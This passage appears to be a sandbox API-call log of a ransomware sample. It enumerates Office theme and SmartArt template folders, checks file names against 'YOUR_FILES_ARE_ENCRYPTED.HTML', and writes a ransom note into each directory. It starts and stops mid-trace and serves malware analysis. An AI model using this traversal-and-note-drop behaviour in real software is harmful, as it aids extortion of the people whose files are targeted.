ftLastAccessTime.dwLowDateTime=0x980694ab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xe1c0f, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457496[[fn=Parallax]].thmx", cAlternateFileName="TM0345~2.THM")) returned 1 [0123.193] StrStrIW (lpFirst="TM03457496[[fn=Parallax]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.193] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 136 [0123.193] PathFindExtensionW (pszPath="TM03457496[[fn=Parallax]].thmx") returned=".thmx" [0123.193] lstrlenW (lpString=".thmx") returned 5 [0123.193] PathFindExtensionW (pszPath="TM03457496[[fn=Parallax]].thmx") returned=".thmx" [0123.193] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9818a945, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9818a945, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba712b00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xec122, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457503[[fn=Quotable]].thmx", cAlternateFileName="TM0345~4.THM")) returned 1 [0123.194] StrStrIW (lpFirst="TM03457503[[fn=Quotable]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.194] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 136 [0123.194] PathFindExtensionW (pszPath="TM03457503[[fn=Quotable]].thmx") returned=".thmx" [0123.194] lstrlenW (lpString=".thmx") returned 5 [0123.194] PathFindExtensionW (pszPath="TM03457503[[fn=Quotable]].thmx") returned=".thmx" [0123.194] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fbbf10, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fbbf10, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x125f51, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457510[[fn=Savon]].thmx", cAlternateFileName="TM0345~1.THM")) returned 1 [0123.194] StrStrIW (lpFirst="TM03457510[[fn=Savon]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.194] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 133 [0123.194] PathFindExtensionW (pszPath="TM03457510[[fn=Savon]].thmx") returned=".thmx" [0123.194] lstrlenW (lpString=".thmx") returned 5 [0123.194] PathFindExtensionW (pszPath="TM03457510[[fn=Savon]].thmx") returned=".thmx" [0123.194] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980b633e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980b633e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x76cc4, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM03457515[[fn=View]].thmx", cAlternateFileName="TM0345~3.THM")) returned 1 [0123.194] StrStrIW (lpFirst="TM03457515[[fn=View]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.194] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 132 [0123.194] PathFindExtensionW (pszPath="TM03457515[[fn=View]].thmx") returned=".thmx" [0123.194] lstrlenW (lpString=".thmx") returned 5 [0123.194] PathFindExtensionW (pszPath="TM03457515[[fn=View]].thmx") returned=".thmx" [0123.194] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978145cc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978145cc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xee481, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033917[[fn=Berlin]].thmx", cAlternateFileName="TM0403~1.THM")) returned 1 [0123.194] StrStrIW (lpFirst="TM04033917[[fn=Berlin]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.194] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx") returned 134 [0123.194] PathFindExtensionW (pszPath="TM04033917[[fn=Berlin]].thmx") returned=".thmx" [0123.194] lstrlenW (lpString=".thmx") returned 5 [0123.194] PathFindExtensionW (pszPath="TM04033917[[fn=Berlin]].thmx") returned=".thmx" [0123.194] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984c4fd2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984c4fd2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xdd034400, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x165552, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033919[[fn=Circuit]].thmx", cAlternateFileName="TMFEFA~1.THM")) returned 1 [0123.194] StrStrIW (lpFirst="TM04033919[[fn=Circuit]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.194] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx") returned 135 [0123.194] PathFindExtensionW (pszPath="TM04033919[[fn=Circuit]].thmx") returned=".thmx" [0123.194] lstrlenW (lpString=".thmx") returned 5 [0123.194] PathFindExtensionW (pszPath="TM04033919[[fn=Circuit]].thmx") returned=".thmx" [0123.194] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982f049f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982f049f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5c911300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x21dbbf, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033921[[fn=Damask]].thmx", cAlternateFileName="TM0403~4.THM")) returned 1 [0123.194] StrStrIW (lpFirst="TM04033921[[fn=Damask]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.194] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx") returned 134 [0123.195] PathFindExtensionW (pszPath="TM04033921[[fn=Damask]].thmx") returned=".thmx" [0123.195] lstrlenW (lpString=".thmx") returned 5 [0123.195] PathFindExtensionW (pszPath="TM04033921[[fn=Damask]].thmx") returned=".thmx" [0123.195] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ab2749, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ab2749, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc68a00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x1ab70b, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033925[[fn=Droplet]].thmx", cAlternateFileName="TM9F98~1.THM")) returned 1 [0123.195] StrStrIW (lpFirst="TM04033925[[fn=Droplet]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.195] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx") returned 135 [0123.195] PathFindExtensionW (pszPath="TM04033925[[fn=Droplet]].thmx") returned=".thmx" [0123.195] lstrlenW (lpString=".thmx") returned 5 [0123.195] PathFindExtensionW (pszPath="TM04033925[[fn=Droplet]].thmx") returned=".thmx" [0123.195] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981588c3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x981588c3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x2358a300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2c9ecd, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033927[[fn=Main Event]].thmx", cAlternateFileName="TM0403~3.THM")) returned 1 [0123.195] StrStrIW (lpFirst="TM04033927[[fn=Main Event]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.195] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx") returned 138 [0123.195] PathFindExtensionW (pszPath="TM04033927[[fn=Main Event]].thmx") returned=".thmx" [0123.195] lstrlenW (lpString=".thmx") returned 5 [0123.195] PathFindExtensionW (pszPath="TM04033927[[fn=Main Event]].thmx") returned=".thmx" [0123.195] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9852435b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9852435b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9cf09100, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x23f73b, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033929[[fn=Slate]].thmx", cAlternateFileName="TMA957~1.THM")) returned 1 [0123.195] StrStrIW (lpFirst="TM04033929[[fn=Slate]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.195] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx") returned 133 [0123.195] PathFindExtensionW (pszPath="TM04033929[[fn=Slate]].thmx") returned=".thmx" [0123.195] lstrlenW (lpString=".thmx") returned 5 [0123.195] PathFindExtensionW (pszPath="TM04033929[[fn=Slate]].thmx") returned=".thmx" [0123.195] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9800b4e9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9800b4e9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4f742400, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x371abc, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM04033937[[fn=Vapor Trail]].thmx", cAlternateFileName="TM0403~2.THM")) returned 1 [0123.195] StrStrIW (lpFirst="TM04033937[[fn=Vapor Trail]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.195] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033937[[fn=Vapor Trail]].thmx") returned 139 [0123.195] PathFindExtensionW (pszPath="TM04033937[[fn=Vapor Trail]].thmx") returned=".thmx" [0123.195] lstrlenW (lpString=".thmx") returned 5 [0123.195] PathFindExtensionW (pszPath="TM04033937[[fn=Vapor Trail]].thmx") returned=".thmx" [0123.195] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98742454, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98742454, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x973bdf00, ftLastWriteTime.dwHighDateTime=0x1d4196d, nFileSizeHigh=0x0, nFileSizeLow=0x10a79d, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM10001114[[fn=Gallery]].thmx", cAlternateFileName="TM1000~2.THM")) returned 1 [0123.195] StrStrIW (lpFirst="TM10001114[[fn=Gallery]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.195] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 135 [0123.195] PathFindExtensionW (pszPath="TM10001114[[fn=Gallery]].thmx") returned=".thmx" [0123.195] lstrlenW (lpString=".thmx") returned 5 [0123.195] PathFindExtensionW (pszPath="TM10001114[[fn=Gallery]].thmx") returned=".thmx" [0123.195] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 1 [0123.195] StrStrIW (lpFirst="TM10001115[[fn=Parcel]].thmx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.196] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001115[[fn=Parcel]].thmx") returned 134 [0123.196] PathFindExtensionW (pszPath="TM10001115[[fn=Parcel]].thmx") returned=".thmx" [0123.196] lstrlenW (lpString=".thmx") returned 5 [0123.196] PathFindExtensionW (pszPath="TM10001115[[fn=Parcel]].thmx") returned=".thmx" [0123.196] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9860260f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9860260f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x235700, ftLastWriteTime.dwHighDateTime=0x1d4196e, nFileSizeHigh=0x0, nFileSizeLow=0x9477a, dwReserved0=0x6dc8f2, dwReserved1=0x6dc828, cFileName="TM10001115[[fn=Parcel]].thmx", cAlternateFileName="TM1000~1.THM")) returned 0 [0123.196] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0123.196] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0123.196] GetProcessHeap () returned 0x600000 [0123.196] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0123.198] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0123.199] CloseHandle (hObject=0x31c) returned 1 [0123.199] GetProcessHeap () returned 0x600000 [0123.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.199] GetProcessHeap () returned 0x600000 [0123.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.199] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 0 [0123.199] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.199] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0123.199] GetProcessHeap () returned 0x600000 [0123.199] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0123.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.200] WriteFile (in: hFile=0x30c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.201] CloseHandle (hObject=0x30c) returned 1 [0123.202] GetProcessHeap () returned 0x600000 [0123.202] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0123.202] GetProcessHeap () returned 0x600000 [0123.202] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.203] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="SmartArt Graphics", cAlternateFileName="SMARTA~1")) returned 1 [0123.203] StrStrIW (lpFirst="SmartArt Graphics", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.203] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics") returned 102 [0123.203] GetProcessHeap () returned 0x600000 [0123.203] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.204] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics" [0123.204] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*" [0123.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0123.205] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.205] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 1 [0123.205] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.205] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033") returned 107 [0123.205] GetProcessHeap () returned 0x600000 [0123.205] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.206] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033" [0123.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*" [0123.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f84ae, dwReserved1=0x6f83e0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0123.207] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, 